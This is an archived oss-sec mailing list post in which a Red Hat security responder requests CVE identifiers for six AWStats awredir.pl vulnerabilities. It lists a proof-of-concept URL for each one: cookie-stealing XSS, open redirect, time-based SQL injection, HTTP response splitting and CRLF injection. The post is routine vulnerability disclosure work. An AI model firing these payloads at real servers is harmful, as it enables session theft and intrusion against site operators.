Home page logo
/

oss-sec logo oss-sec mailing list archives

CVE Request -- Multiple security issues in various versions of AWStats
From: Jan Lieskovsky <jlieskov () redhat com>
Date: Fri, 07 Oct 2011 10:17:15 +0200

Hello Josh, Steve, vendors,

  these doesn't look like CVE ids have been already assigned for:
  [1] https://bugzilla.redhat.com/show_bug.cgi?id=740926#c0
  [2] http://secunia.com/advisories/46160/
  [3] http://seclists.org/fulldisclosure/2011/Sep/234
  [4] http://websecurity.com.ua/5380/

If I counted correctly, six CVE ids should be assigned for these
(since different versions are listed as vulnerable):

1) XSS (WASC-08) (in versions <=1.1):
   http://site/awredir.pl?url=javascript:alert(document.cookie)

2) Redirector (URL Redirector Abuse in WASC 2.0) (WASC-38):
   http://site/awredir.pl?url=http://websecurity.com.ua

3) SQL Injection (WASC-19): (version 1.2)
   http://site/awredir.pl?url='%20and%20benchmark(10000,md5(now()))/*

4) XSS (WASC-08) (in version 1.2):

   http://site/awredir.pl?url=%3Cscript%3Ealert(document.cookie)%3C
   /script%3E

   http://site/awredir.pl?key=%3Cscript%3Ealert(document.cookie)%3C
   /script%3E

5) HTTP Response Splitting (WASC-25):

   http://site/awredir.pl?key=04ed5362e853c72ca275818a7c0c5857&;
   url=%0AHeader:1

6) CRLF Injection (Improper Input Handling in WASC 2.0) (WASC-20):

   http://site/awredir.pl?key=4b9faa91e2529400c4f3c70833b4e4a5&;
   url=%0AText

Could you allocate CVE identifiers for these? (let me know
if further description of each of the issues is necessary prior
assignment).

Thank you && Regards, Jan.
--
Jan iankko Lieskovsky / Red Hat Security Response Team


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]